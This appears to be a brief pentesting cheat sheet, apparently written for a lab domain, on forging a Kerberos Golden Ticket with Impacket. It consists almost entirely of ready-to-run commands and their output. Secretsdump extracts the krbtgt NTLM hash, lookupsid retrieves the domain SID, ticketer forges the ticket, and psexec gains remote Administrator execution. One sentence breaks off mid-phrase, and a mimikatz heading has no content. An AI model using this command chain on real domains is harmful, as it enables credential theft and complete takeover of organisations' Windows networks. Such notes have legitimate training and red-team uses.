Golden Ticket
Using mimikatz
Using impacket tools
Extract the krbtgt NTLM hash
secretsdump.py Administrator:<PASSWORD>@10.10.100.200
[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]
Extract SID of Domain
lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200
[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]
Generating Golden Ticket
Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a
ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla
Using ticket
export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py CONTROLLER.local/Administrator@10.10.100.212 -k -no-pass
Last updated